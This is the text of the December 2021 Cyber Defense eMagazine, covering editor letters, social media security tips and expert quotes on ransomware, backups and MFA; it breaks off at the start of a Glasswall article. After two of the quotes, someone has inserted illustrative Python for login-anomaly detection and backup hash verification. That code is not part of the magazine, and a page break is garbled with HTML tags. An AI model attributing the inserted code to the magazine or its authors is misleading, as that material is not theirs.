Cyber Defense eMagazine December Edition for 2021
Will you stay one step ahead of Cyber Scrooge this year? Learn new ways to protect your family, job, company & data. December Cyber Defense eMagazine: Cyber Deception Month is here...Defeat Cyber Scrooge! Cyber Defense Magazine December Edition for 2021 in online format #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky, a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group, as well as Yan Ross, US Editor-in-Chief, Pierluigi Paganini, International Editor-in-Chief and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES See you at RSA Conference 2022 - Our 10th Year Anniversary @RSAC #RSACONFERENCE #USA - Thank you so much!!! - Team CDMG CDMG is a Carbon Negative and Inclusive Media Group.
9 Ways Social Media Sabotages Your Cybersecurity
How Covid-19 Changed Advertising Forever
The Benefits of Hyperautomation
Why Do You Need a Malware Sandbox?
…and much more…
Cyber Defense eMagazine – December 2021 Edition 1
Copyright © 2021, Cyber Defense Magazine. All rights reserved worldwide.
CONTENTS
Welcome to CDM’s December 2021 Issue ... 6
9 Ways Social Media Sabotages Your Cybersecurity ... 38
By Alex Lysak, CEO of Scanteam
Cyber Crime Is on The Rise and These Experts Have the Knowledge You Need ... 42
By Jon Clemenson, Director of Information Security, TokenEx
When Diplomacy, Finance and Tech Collide: Cybersecurity Lessons Learned from Years Across Careers ... 49
By Danny Lopez, CEO, Glasswall
How Covid-19 Changed Advertising Forever ... 53
By Bernie Brode, product researcher at Microscopic Machines
Why MFA Alone Isn’t Enough for True Cybersecurity ... 57
By Bojan Simic, Co-Founder, Interim CEO & CTO, HYPR
Can Your Cybersecurity Culture Stand Up to the Latest Spear Phishing Techniques? ... 60
By Josh Yavor, Chief Information Security Officer, Tessian
3 Best Practices to Avoid Inevitable Ransomware Attacks ... 63
By Jesper Zerlang, CEO, LogPoint
The Benefits of Hyperautomation ... 66
By Nathan Hull, Principal Solutions Architect, Technologent
Electric Vehicle Charging: The Next Cyberattack Frontier ... 69
By Prof. Thomas R. Köhler, Member of the Board of Juice Technology AG
Will Multi-Factor Authentication (MFA) Implementation Protect Countries from Cybercriminals? ... 72
By Marcin Szary, CTO and co-founder, Secfense
Why Do You Need a Malware Sandbox? ... 76
By ANY.RUN Team
Multi-Cloud Security and Compliance: Challenges & Best Practices ... 79
By Avi Shua, CEO and Co-Founder, Orca Security
How Do You Secure the Modern Supply Chain? ... 83
By Brett Raybould, EMEA Solutions Architect, Menlo Security
Don’t Take Yourself Out of The Game: Mitigating the Risk Of An Organizational Conflict Of Interest In Federal Contracts ... 87
By Michelle Litteken, Of Counsel, Morris, Manning & Martin LLP
Is Anti Data Exfiltration the Holy Grail of Cyberattack Prevention? ... 92
By Dr. Darren Williams, Founder & CEO, BlackFog, Inc.
Attorney-Client Privilege Communication Best Practices ... 96
By Nicole Allen, Marketing Executive, Salt Communications
The Line-of-Sight Cybersecurity Problem in Healthcare ... 100
By Samuel Hill, Director of Product Marketing, Medigate
Caution: Personal Data Memorization in Progress ... 104
By Patricia Thaine, Co-Founder & CEO, Private AI
Q&A: Roland Cloutier, Chief Security Officer, TikTok and ByteDance ... 108
By Roland Cloutier
Techniques Used by Hackers to Bypass Email Security Solutions ... 113
By Michael Aminov, Perception Point
How To Protect Your Digital Legacy ... 119
By Jamie Wilson, MD, Cryptoloc Technology Group
Sextortion Email Scams ... 123
By Harman Singh, director at Cyphere
Getting Started with Active Directory Security ... 130
By Justin Kohler, Director of BloodHound Enterprise, SpecterOps
Surviving The New Era of Terabit-Class DDoS Attacks ... 133
By Richard Hummel, Threat Intelligence Lead, NETSCOUT
Cyber (In)Secure: Business Sentiment on Cyber Security Challenges ... 136
By James Edgar, Senior Vice President and Chief Information Security Officer, FLEETCOR
Enterprises Cannot Achieve Zero Trust Security Without Machine Identity Management ... 139
By Murali Palanisamy, chief solutions officer, AppViewX
@MILIEFSKY
From the Publisher…
Dear Friends,
Looking back over ten years of publishing Cyber Defense Magazine, it is an honor and a pleasure for me to report on the growth of our organization and the breadth of our services.
Cyber Defense Magazine has been the central and driving force in the Cyber Defense Media Group array of publishing, advertising, and other valuable media services. Since its initiation 10 years ago, we have published some 3500 articles from expert authors across the entire spectrum of cybersecurity endeavors.
In addition to the Cyber Defense Magazine B2B offering, we publish the online B2C Cyber Security Magazine. Between the 2 magazines, we provide millions of discrete clicks each month to the benefit of our advertisers, authors, and their companies – as well as the educational value of bringing actionable information to our readers.
Cyber Defense TV has become a mainstay for growing cyber businesses to broadcast their messages and value propositions to a wide audience of professional and management individuals.
Our Global Cyber Awards and Black Unicorn publications have taken center stage for our millions of readers and online audience participants.
As we celebrate 10 years of publishing, we must also look forward to the growing challenges from vulnerabilities and solutions in cyber activities. Among the first are the 16 sectors of critical infrastructure and their integrated command and control support. But we pride ourselves in reaching organizations of all sizes and types, including SMEs, nonprofit, and government entities.
We are pleased to bring you a broad spectrum of articles with actionable information and wish you all success in your own cyber endeavors.
Warmest regards,
Gary S. Miliefsky, CISSP®, fmDHS
CEO, Cyber Defense Media Group
Publisher, Cyber Defense Magazine
P.S. When you share a story or an article or information about CDM, please use #CDM and @CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more quickly.
We’ll be celebrating our 10th Year in business and of our Global InfoSec Awards and as a Platinum Media Partner of RSA Conference on Feb 7 – 10, 2022 – See You There!
@CYBERDEFENSEMAG
CYBER DEFENSE eMAGAZINE
Published monthly by the team at Cyber Defense Media Group and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.
InfoSec Knowledge is Power. We will always strive to provide the latest, most up to date FREE InfoSec information.
From the International Editor-in-Chief…
Once again, in this month’s review, we see a growing, but disparate, influence of privacy initiatives in the international arena. If we could liken the movements and reactions to a physical being, it would look like expansion occurs with breathing in, and contraction occurs with breathing out. It seems that each time one of the national or international bodies (including States and Provinces) takes an action to expand its privacy reach, others move in a conflicting direction.
Ultimately, however, we continue to hope that the efficiencies of uniformity will prevail – taking into account, of course, the necessities of cultural and historical differences observed on the international scene.
Why, one might ask, do we find privacy initiatives influencing cybersecurity? As it happens, the playing field on which privacy legislation and regulation take place is largely a cyber-based structure. The vast majority of personal and sensitive information is transmitted, stored, accessed, and analyzed in cyber space. Whether in the servers of the affected organization or in the “cloud” (someone else’s server), compliance with privacy requirements happens in conjunction with cybersecurity.
As always, we encourage cooperation and compatibility among nations and international organizations in responding to these cybersecurity and privacy matters.
To our faithful readers, we thank you,
Pierluigi Paganini
International Editor-in-Chief
INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER
Pierluigi Paganini, CEH
Pierluigi.paganini@cyberdefensemagazine.com
US EDITOR-IN-CHIEF
Yan Ross, JD
Yan.Ross@cyberdefensemediagroup.com
ADVERTISING
Marketing Team
marketing@cyberdefensemagazine.com
CONTACT US:
Cyber Defense Magazine
Toll Free: 1-833-844-9468
International: +1-603-280-4451
SKYPE: cyber.defense
http://www.cyberdefensemagazine.com
Copyright © 2021, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP
1717 Pennsylvania Avenue NW, Suite 1025
Washington, D.C. 20006 USA
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.
PUBLISHER
Gary S. Miliefsky, CISSP®
Learn more about our founder & publisher at:
http://www.cyberdefensemagazine.com/about-our-founder/
9+ YEARS OF EXCELLENCE!
Providing free information, best practices, tips, and techniques on cybersecurity since 2012, Cyber Defense Magazine is your go-to source for Information Security. We’re a proud division of Cyber Defense Media Group:
CYBERDEFENSEMEDIAGROUP.COM
MAGAZINE TV RADIO AWARDS PROFESSIONALS VENTURES WEBINARS CYBERSECURITYMAGAZINE (FOR CONSUMERS)
Welcome to CDM’s December 2021 Issue
From the U.S. Editor-in-Chief
As we complete the year 2021 in our publishing rotation, we can see patterns developing and extending into the future. The breadth of topics among the 26 articles in the December issue of Cyber Defense Magazine reflects the perceived concerns and (in many cases) solutions offered by our contributing authors.
This enlightening view of current industry challenges provides, among other benefits, both high-altitude observations and down-to-earth granular analysis of the developments in cybersecurity today.
Take a moment to read through the Table of Contents. You will see numerous articles you will find of immediate interest. That is representative of how Cyber Defense Magazine strives to bring our readers actionable intelligence from highly knowledgeable cyber professionals.
Once again, the articles this month cover a broad spectrum of threats, preventive measures, ways to assure resilience and sustainability, and operational advice for organizations needing to maintain the confidentiality, accessibility, and integrity of sensitive data.
We believe Cyber Defense Magazine is most valuable to our readers by keeping current on emerging trends and solutions in the world of cybersecurity, and we use that guide as our pole star in undertaking this journey with our readers.
Wishing you all success in your cybersecurity endeavors,
Yan Ross
US Editor-in-Chief
Cyber Defense Magazine
About the US Editor-in-Chief
Yan Ross, J.D., is a Cybersecurity Journalist & U.S. Editor-in-Chief of Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects, and is the author of the Certified Identity Theft Risk Management Specialist® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him by e-mail at yan.ross@cyberdefensemediagroup.com
9 Ways Social Media Sabotages Your Cybersecurity
By Alex Lysak, CEO of Scanteam
Social media has become one of the most common ways to spend time online, with many of the world's most popular websites offering social features. Social media is described as a digital platform that allows users to create an account, share content and interact with other users. The main examples are sites such as Facebook, Twitter, and Instagram, but there are hundreds of different social media sites, each offering a unique set of features and catering to different groups of people.
Social media is perfect for connecting with friends and family, as well as sharing ideas and content with people from all over the world. It's also a great place for businesses to interact with their potential consumers, engaging with them and advertising to them. One of the reasons why social media sites have become so successful is that they sell personal data to companies for advertising purposes. Brands can target people based on their age, location, and likes, reaching their target demographics more easily.
Although social media is very popular, with over half of the world's population now owning at least one account, it does raise cybersecurity issues. When signing up to a social media site, users need to be careful that they're not compromising their data, falling victim to data leaks, or downloading malware.
With over 4 billion users, social media platforms present a big target for hackers, scammers, and identity thieves. As a result, it pays to be careful about the platform you use and how you use it. In this article, our US cybersecurity expert Alex Lysak looks at nine different ways social media and cybersecurity are connected and how to practice social media safety.
What is Cybersecurity?
Cybersecurity is the practice of protecting devices or networks from cyber-attacks, malware or other online threats. These cyberattacks are typically aimed at gaining access to, altering, or destroying sensitive data, extorting money from users, or disrupting normal corporate activities. Whether you're an individual or a company, cybercriminals don't discriminate, and you need to be able to protect your devices and data from cyber security threats.
Because there are more devices than humans nowadays, and attackers are growing more inventive, putting in place effective cybersecurity measures is very difficult. Over the last few years, there has been a rise in the number of high-profile cyber-attacks, particularly those using ransomware. This type of malware encrypts a user's data, making it useless unless the user gives in to demands and pays a ransom.
Hackers often demand payment in the form of cryptocurrency, which has the advantage of being much easier to use than other forms of online payment. Payments made using cryptocurrencies have increased a lot over the past few years; as researched by Scanteam, this is partly thanks to the added level of security as well as the potential anonymity.
Protecting Yourself While Using Social Media
Although you can use antivirus software and other tools to keep your device secure from threats, the best way to stay safe online is by taking the right precautions. By following good practices while online, you can avoid malware and stay safe from cyber-attacks, including those on social media.
Here are a few of the things to avoid or be careful of when using social media if you want to stay secure:
Providing Too Much Personal Information
When using social media, users often fill out their profiles without caring much about who sees them. Although it may seem innocuous to provide details on your birthday, your family members, where you grew up, and more, it can put you at risk. By publishing so much information about yourself online, you can be affecting your cybersecurity, making it easier for hackers to gain entry to your accounts or for identity thieves to open up credit cards or bank accounts in your name.
You should also be careful about the contact details you provide, as scammers will often look for email addresses and phone numbers. When combined with your personal information, they can
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 39<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
use this to create highly believable scams aimed at extracting money from your accounts. Privacy is one<br />
of the most important social media security issues, and users should be more careful about their personal<br />
in<strong>for</strong>mation.<br />
Phishing Scams

A phishing scam is one of the most common types of online scam, in which scammers use social engineering to get the information they want. This type of social engineering involves an attacker sending a phony message to a human target in the hope of obtaining sensitive information. The scam may also deploy harmful software on the victim's infrastructure, such as ransomware.

When using social media, you should always be wary of messages you receive, especially from people you don't know. Sometimes a phishing message can even appear to come from someone you know, either through a hacked account or a fake profile.
Insecure Passwords

Passwords are essential for keeping your accounts secure, and you should always make sure to use strong passwords no matter what kind of account it is. Using weak passwords is asking for trouble, as it means hackers can easily break into your account. Not only that, but you should also avoid reusing passwords on multiple accounts. You shouldn't use the same password for your online banking and your Facebook account, for example.
Single Layer Security

Passwords aren't the only thing you should use to secure your account; many online sites also offer two-factor authentication or a digital ID. This is where the site sends a code to your phone for you to enter in addition to your password. You should definitely set this up, as it means that even if hackers manage to crack your password, they won't be able to get access to your account.
Outdated Apps

Social media apps are constantly updated to remove bugs and exploits that make them vulnerable to social networking security threats. If you want your device to stay safe, make sure the app you're using is up to date, and if you're not sure, you can check to see if updates are available. Additionally, you can set the app to update automatically when new software patches are released.
Unsecured Mobile Networks

When using social media on a mobile device, you should be careful about which networks you connect to. Using mobile data in the US is fine, but connecting to open Wi-Fi networks is often a risk. When you connect to an unsecured mobile network, you could be opening your device up to malware and cyberattacks.
Malware Links

Malware links are rare on social media as they often get reported and taken down. However, you can still find plenty of examples of social media cyber-attacks through malware being spread over various platforms, particularly through private messages. If you don't know the person, never open the link, and be very careful about what links you open in general.
Tags and Locations

Part of the fun of social media is tagging friends in photos and sharing your location. However, this can potentially put you at risk. Be careful about sharing your location online, especially as you never know who can see this information. Some people in the US have had their homes robbed after revealing their location on social media, and it can be a cybersecurity risk too.
Poor Privacy Controls

When using social media, you're in control of who gets to see the content that you share, but you do need to adjust the privacy settings to change this. Make sure you revisit these settings often to prevent people not connected to you from accessing your personal data and to ensure proper data security.
About the Author

Alex Lysak has been working in online marketing since 2011; his main areas of expertise are marketing research, social media marketing, and SEO. During 9+ years of experience, he has helped many products and startups to develop marketing strategies and to implement them. Alex Lysak can be reached online at alexlysak.scanteam.pro@gmail.com, on Twitter, and at our company website https://scanteam.pro/
Cyber Crime Is on The Rise and These Experts Have the Knowledge You Need

By Jon Clemenson, Director of Information Security, TokenEx

Nearly every day, there's news about another major cyberattack on a large organization. We are living in a new reality where organizations are fighting a constantly evolving and restrategizing enemy, and the Biden Administration has heavily focused on investing resources and manpower to combat ransomware. This investment is represented by the President's recent Executive Order that presents actions to improve cybersecurity of U.S. critical infrastructure.

Celebrated in October, National Cybersecurity Awareness Month is a time to re-educate all individuals on effective cyber hygiene and what to be on the lookout for in this new age of hybrid work. We spoke with 10 cybersecurity experts to get their insight on best practices every organization can implement to keep themselves, their employees and their customers safe.
Terry Storrar, managing director, Leaseweb UK

"The security risks of remote working have been well documented. Away from the office, employees are now far more likely to practice poor cyber hygiene, for example connecting to unsafe networks, transferring work data to personal devices, or sharing unencrypted files. And threat actors are relentlessly taking advantage of these vulnerabilities.
However, as concerning as these practices are, they are often relatively simple to fix. This Cybersecurity Awareness Month provides the perfect opportunity to remind ourselves and co-workers to do our part and #BeCyberSmart. The simplest way we can do this is by developing good daily routines that work to manage the most common cybersecurity risks facing our organisations. Examples of this include keeping software up to date, backing up data, and maintaining good password practices. At the end of the day, lack of education and human error are two of the largest contributors to data breaches. Businesses need to start implementing more safeguarding protocols and make cybersecurity training not just accessible for all employees, but a basic part of onboarding.

Cyber attacks nowadays do not often come from ingenious 'hackers' in dark rooms; they're often the result of an employee reusing the same password, or businesses not implementing basic practices such as multi-factor authentication. By acting smart now, we can eliminate some of the greatest cyber threats facing our businesses today."
Liron Damri, president/co-founder, Forter

"At Forter, we've seen a marked uptick in Account Takeovers (ATO), a form of identity fraud in which a third party steals credentials and/or gains access to user accounts. Our first-party data shows that ATO has increased 55% year-over-year!

How can that be? The global pandemic has kept people home, and so many consumers have entered the world of eCommerce. Many of those who are new to eCommerce have proven more likely to reuse passwords and less likely to follow security best practices. Fraudsters have been opportunistic in taking over these accounts.

The burden isn't only on the consumer here; it's on businesses to deploy more sophisticated methods and models to protect those new customers from ATO—identifying them (and approving their transactions) and preventing fraud and abuse."
Jon Clemenson, director of information security, TokenEx

"This National Cybersecurity Awareness Month, we're reminded of how constantly evolving cyber threats such as breaches and ransomware create the need for security professionals to develop increasingly sophisticated defense strategies. These strategies can vary widely, which makes it especially important for security leaders to select the appropriate controls and security methods for the unique needs of their organization.
In reality, there's no one 'silver bullet' for cyber defense. Instead, a mature posture will combine a variety of security methodologies and technologies for data discovery, classification, access management, protection, and more. Further, it must function in a manner that accommodates necessary business operations. Finding the right balance between security and operability is one of the greatest challenges security professionals face, but it's absolutely essential for a successful cybersecurity strategy."
Tyler Farrar, CISO, Exabeam

"National Cyber Security Awareness Month 2021 is a time to reflect on the major technological and lifestyle shifts brought on by the pandemic and their security implications. Remote work unexpectedly became the norm in 2020, and as we close out 2021, the hybrid work model may be here to stay for decades to come. It's clear that it's working.

These changing approaches to work have caused security leaders and their teams to balance what's necessary to keep sensitive company data and assets safe and secure in organizational landscapes that no longer have a security perimeter. People are everywhere now. Meanwhile, adversaries are growing more sophisticated by the hour. Critical infrastructure organizations like Colonial Pipeline, agriculture organizations like New Cooperative and tech firms like Kaseya and Olympus being targeted by cybercriminal groups are hitting the headlines on a near-weekly basis. How can security teams keep up with the barrage of attacks and network perimeter shifts?

Rather than retreating back to legacy methods and previous strategies, companies must #BeCyberSmart and tackle modern threats head on. It's critical to highlight that compromised credentials are the reason for 61% of breaches today. To remediate incidents involving user credentials and respond to adversaries, organizations must consider an approach that is closely aligned with monitoring user behavior to get the necessary context needed to restore trust, and react in real time, to protect employee accounts. This should include the ability to understand what normal looks like in your network, so when anything abnormal occurs, you can immediately detect it and prevent it from causing harm or damage to your organization.
Employees must also play a role. Security teams that shake up their password protocols, such as never using the same password twice, using password vaults and enabling multi-factor / adaptive authentication, are winning against the adversaries. A combination of behavioral analytics and smart password practices can help employees, and their employers, stop credential-based attacks and adversarial lateral movement. Use this month to be sure you have the right threat detection, investigation and response (TDIR) technologies in place for yourself and your security teams."
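A minimal version of the "know what normal looks like" idea in the comments above, added here as an illustration rather than anything Exabeam or the article supplies: a per-account baseline of where, when and from which device each user normally signs in is learned from a constructed login history, and a new batch of records is scored against it. The log format, the sample lines, the two-hour tolerance and the "two deviations to alert" threshold are all assumptions made for the example.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime


@dataclass
class Baseline:
    """What 'normal' looks like for one account, learned from historical successful logins."""
    countries: set = field(default_factory=set)
    hours: set = field(default_factory=set)      # UTC hours at which the user has signed in
    devices: set = field(default_factory=set)


# Constructed sample records: "timestamp user country device result" (not real log data).
HISTORY = """\
2021-11-01T08:05:00 alice US laptop-a1 success
2021-11-01T17:40:00 alice US laptop-a1 success
2021-11-02T09:12:00 alice US phone-a2 success
2021-11-01T22:30:00 bob UK desktop-b1 success
2021-11-03T23:10:00 bob UK desktop-b1 success
"""

NEW_EVENTS = """\
2021-11-10T08:30:00 alice US laptop-a1 success
2021-11-10T03:15:00 alice RU host-x9 success
2021-11-10T22:45:00 bob UK desktop-b1 success
2021-11-10T22:50:00 bob UK desktop-b1 failure
"""


def parse(lines: str):
    """Yield (timestamp, user, country, device, result) tuples from the constructed format."""
    for line in lines.splitlines():
        ts, user, country, device, result = line.split()
        yield datetime.fromisoformat(ts), user, country, device, result


def build_baselines(history: str) -> dict:
    """Learn a Baseline per user from successful logins only; failures do not define normal."""
    baselines = defaultdict(Baseline)
    for ts, user, country, device, result in parse(history):
        if result != "success":
            continue
        b = baselines[user]
        b.countries.add(country)
        b.hours.add(ts.hour)
        b.devices.add(device)
    return baselines


def score_event(baselines: dict, ts, user, country, device) -> list:
    """Return the deviations of one login from the user's baseline (empty list = looks normal)."""
    b = baselines.get(user)
    if b is None:
        return ["unknown user"]
    reasons = []
    if country not in b.countries:
        reasons.append(f"new country {country}")
    if device not in b.devices:
        reasons.append(f"new device {device}")
    # Assumed tolerance: within two hours of any previously seen login hour.
    # (Simplification: no wrap-around at midnight.)
    if not any(abs(ts.hour - h) <= 2 for h in b.hours):
        reasons.append(f"unusual hour {ts.hour:02d}:00 UTC")
    return reasons


def detect(history: str, events: str, min_reasons: int = 2) -> list:
    """Flag successful logins that deviate from the baseline in at least `min_reasons` ways.
    A single new device is routine; a new device from a new country at an odd hour is not."""
    baselines = build_baselines(history)
    alerts = []
    for ts, user, country, device, result in parse(events):
        if result != "success":
            continue          # failed attempts belong to lockout / brute-force rules instead
        reasons = score_event(baselines, ts, user, country, device)
        if len(reasons) >= min_reasons:
            alerts.append((user, ts.isoformat(), reasons))
    return alerts
```

Run against the constructed data, only alice's 03:15 sign-in from a new country on a new device is flagged; her routine morning login and bob's late-evening logins match their baselines. In a real deployment the baseline would be learned over weeks and the thresholds tuned per population, but the shape of the check is the same.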
Danny Lopez, CEO, Glasswall

"During this year's National Cyber Security Awareness Month, I very much hope executive teams realize that employees should not be the only line of defense against cyberattacks. With the growing technological sophistication of data breaches and the sheer volume of threats today, any individual within a network can easily become a target.

Unfortunately, most employees are unfamiliar with how to properly protect themselves. Attackers know how to depend on predictable patterns of human behavior to gain an advantage against their targets. Many users don't think twice about opening an attachment or clicking a link that appears to be legitimate. As insider threats have increased by 47% this year, users may also think they are communicating with a colleague when the account has actually been taken over by an adversary.

The best option is to remove the threat entirely before the user needs to make a choice. Increasingly, traditional sandboxing and antivirus software aren't enough. Implementing solution-based file protection software like Content Disarm and Reconstruction (CDR) can rebuild files to a higher security standard so users can benefit from safe, clean files and organizational leadership can have peace of mind."
Surya Varanasi, CTO, StorCentric

"Driven in large part by the COVID pandemic, massive layoffs, and record numbers of people being sent home virtually overnight to work, learn, shop and live, the number of successful cyberattacks climbed to dizzying heights. In fact, recent IDC research indicated that over the past year, more than one third of organizations worldwide experienced a ransomware attack or breach that successfully blocked access to systems or data. And for those that fell victim, many experienced multiple ransomware events. With cybercrime projected to cost the world $10.5 trillion annually by 2025, it is clear why ensuring your organization is taking the appropriate measures to ensure cyber safety and security must become priority number one.

Traditionally, the game plan has been to maintain production data storage on-site, snapshot the data, replicate to an off-site location, store it to a disk, and then move it to tape storage and/or the cloud. Unfortunately, cybercriminals know this and have engineered their technology to behave accordingly. Bad actors can now rather easily use ransomware to infiltrate your network and render all forms of traditional backup useless.
Today, what is required is an elevation in backup strategy from basic to unbreakable. In other words, for today's ransomware threat what's needed is to make backed up data immutable, thereby eliminating any way it can be deleted or corrupted. Unbreakable Backup can do just that by creating an immutable, secure format that also stores the admin keys in another location entirely for added protection. And, by layering on a backup solution that has built-in verification, savvy SysAdmins can alleviate their worry about their ability to recover — and redirect their time and attention to activities that more directly impact their organization's bottom-line objectives."
JG Heithcock, general manager of Retrospect, a StorCentric company

"Today's cyber criminals are attacking backups first, and then once under their control, coming after production data. This means that many enterprises are feeling a false sense of security, until it is already too late.

I like to say, 'backup is one thing, but recovery is everything.' In other words, choose a backup solution that ensures the recovery piece (which surprisingly, not all of them do). Look for a provider with vast experience, as well as a track record for continuous innovation that ensures its offerings are prepared to meet prevailing conditions. The solution(s) should provide broad platform and application support and ensure protection of every part of your IT environment, on-site, remote, in the cloud and at the edge.

Next, the backup solution should auto-verify the entire backup process, checking each file in its entirety to ensure the files match across all environments, and you are able to recover in the event of an outage, disaster or cyber-attack. And, as a last but highly critical step -- at least one backup should be immutable -- unable to be altered or changed in any way, at any time. Even if the ransomware took a ride along with your data to your backup site, during the last backup."
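The auto-verification described above, checking each file in its entirety against the copy at the backup site, is at heart a hash-manifest comparison. The code below is an added illustration, not Retrospect's or StorCentric's own, of that check over a constructed source and backup directory: it hashes every file on both sides and reports files that are missing, present only in the backup, or altered (the case a ransomware-encrypted copy would fall into). The file names and contents are constructed for the example; immutability itself is a property of the storage tier and is not modeled here.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """SHA-256 over the whole file, streamed so large backup sets need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file path relative to `root` (with '/' separators) to its SHA-256 digest."""
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): hash_file(p)
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def verify_backup(source: Path, backup: Path) -> dict:
    """Compare source and backup manifests. Any non-empty list means a restore would be incomplete."""
    src, dst = build_manifest(source), build_manifest(backup)
    return {
        "missing": sorted(set(src) - set(dst)),      # in the source, never copied
        "extra": sorted(set(dst) - set(src)),        # only at the backup site
        # same path on both sides but different content, e.g. encrypted or corrupted copy
        "altered": sorted(p for p in src.keys() & dst.keys() if src[p] != dst[p]),
    }


def demo() -> dict:
    """Constructed scenario: three source files; the backup lacks one, has one tampered copy,
    and carries a stale leftover file."""
    with tempfile.TemporaryDirectory() as tmp:
        source, backup = Path(tmp, "source"), Path(tmp, "backup")
        for root in (source, backup):
            (root / "docs").mkdir(parents=True)
        (source / "docs" / "report.txt").write_text("Q4 numbers\n")
        (source / "docs" / "plan.txt").write_text("roadmap\n")
        (source / "db.sqlite").write_bytes(b"\x00" * 4096)
        (backup / "docs" / "report.txt").write_text("Q4 numbers\n")   # faithful copy
        (backup / "docs" / "plan.txt").write_text("\x00garbage\x00")   # tampered copy
        # db.sqlite is deliberately absent from the backup
        (backup / "old.bak").write_text("stale\n")                      # leftover at backup site
        return verify_backup(source, backup)
```

A scheduled job that runs `verify_backup` after every backup and alerts on any non-empty list gives the "able to recover" assurance the quote asks for; comparing digests rather than sizes or timestamps is what catches a file that was silently rewritten in place.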
Andy Fernandez, senior manager, product marketing, Zerto, a Hewlett-Packard Enterprise company

"Saying that ransomware attacks are growing in severity and volume is an understatement. Hackers are finding ways to prolong unplanned downtime and increase data loss, and getting operational (back up and running) as quickly as possible is key. Yet legacy data protection solutions aren't focused on the speed of recovery—only on recovering that data. Many organizations pay the ransom simply because of how long it would take their backup systems to restore encrypted data. While restoring the encrypted data is paramount, meeting those SLAs must have equal priority within the modern organization. Organizations cannot afford to wait days for critical applications to be up and running. From web experiences to employee tools, time is money and reducing unplanned downtime is key.

Ransomware attacks are evolving, targeting next-gen applications like Kubernetes and Microsoft 365. As the adoption of cloud applications grows, so will exploits and attacks and in turn the importance of restoring data. Modern organizations that are responsible for that data will need to have native data protection solutions that can help them protect internal applications and applications shipped using containers. For example, we are seeing file-less attacks explicitly targeting stateful Kubernetes data. The consequences of downtime for these applications are growing, and organizations need solutions that are native and purpose-built to protect these applications. Whether the target is VMs, Kubernetes, or SaaS applications, being resilient when facing ransomware attacks is crucial."
Wes Spencer, VP, external CSO, ConnectWise

"Let's admit it. Cybersecurity feels like a losing game. Breaches happen everywhere we look. It seems like no effort we make is really making a difference. And beyond that? Ransomware threat actors are spotted on the news driving camo green Lamborghini Aventadors. I can understand any SMB just wanting to give up in exasperation. But there is hope, and it comes in the form of cyber resilience.

If you've never heard of cyber resilience, don't be shocked. It's a decade-old term that is finally being revived amidst our travails but is now shining light as a powerful solution for MSPs and their SMBs. In short, cyber resilience is a renewed focus on keeping an organization resilient and operational in the midst of adverse cybersecurity conditions. Translated thus: let's build resilience to keep our organization functional when, not if, the big cyber attack happens. It allows us to focus on faster response and recovery to any threat. To be clear, we should not give up on prevention; we simply need to have a new focus on cyber resilience. After all, if we're unable to stop all cyber attacks, maybe we should start to focus on making them less impactful when they occur."
Neil Jones, cybersecurity evangelist, Egnyte

"During Cybersecurity Awareness Month, we should actively review our cybersecurity preparedness, and consider how we can make our employees, contractors and business partners even safer online. Unfortunately, many organizational stakeholders are unaware of how to properly protect their companies' valuable data, so it's up to the company to educate them on best practices. As an IT leader, you need to consistently update your cyberattack prevention strategies and implement practical measures like the following, which will protect you from falling victim to potential attacks:

· Make compulsory cybersecurity awareness training a way of life, rather than a once-a-year IT requirement.
· Limit access to mission-critical data on a "business need to know" basis.
· Advocate a proactive approach to detect data misuse, including potential Insider Threats, before it's too late.
· Encourage all of your company's stakeholders to speak up if they see a potential IT Security issue. Just like at the airport or in a train station, "if they see something, they should say something."

Throughout this month, encourage your employees and executive team to take proactive steps to enhance cybersecurity and remember to reinforce the importance of personal accountability with all of your associates."
About the Author

In his role as TokenEx's information security practice lead, Jon Clemenson combines a focus on quantifying and improving our security posture with a passion for automation. With 15 years of results-driven leadership experience in the tech industry and federal government, he considers security a team sport and enjoys tackling problems from a learn-it-all perspective. When he isn't implementing initiatives that align security with business efficiency, you can find him in line at the nearest food truck.
When Diplomacy, Finance and Tech Collide: Cybersecurity Lessons Learned from Years Across Careers

By Danny Lopez, CEO, Glasswall

While technology, finance and diplomacy may seem worlds away from one another in most people's minds, they may be surprised to learn that there is significant crossover in the skills required.

Prior to my time at Glasswall, I worked in finance for the first decade of my career at Barclays in a variety of international banking positions. I then transitioned into working as the managing director of marketing and communications at the Department of International Trade in the UK, where I focused on implementing a marketing plan for the promotion of the UK economy internationally. I also worked with former London Mayor Boris Johnson to create London & Partners, the UK capital's international trade, investment, and promotional agency. After this role, I was appointed to the post of British Consul General to New York, where I was responsible for the UK's economic profile, foreign policy, and national security priorities in the tri-state area. During those five years, I gained a strong interest in technology which led to my role as the COO of Blippar, a technology firm specializing in augmented reality, before joining Glasswall.
These cross-industry roles have collided to teach me valuable lessons about running transatlantic organisations, as well as how to protect them from digital adversaries and nation-state threats. Through my diverse experience, I've learned that organisations can make improvements to their overall cybersecurity effectiveness by focusing on improving training, taking initiative, and increasing internal communication and collaboration efforts.
Cybersecurity Culture Starts at the Top

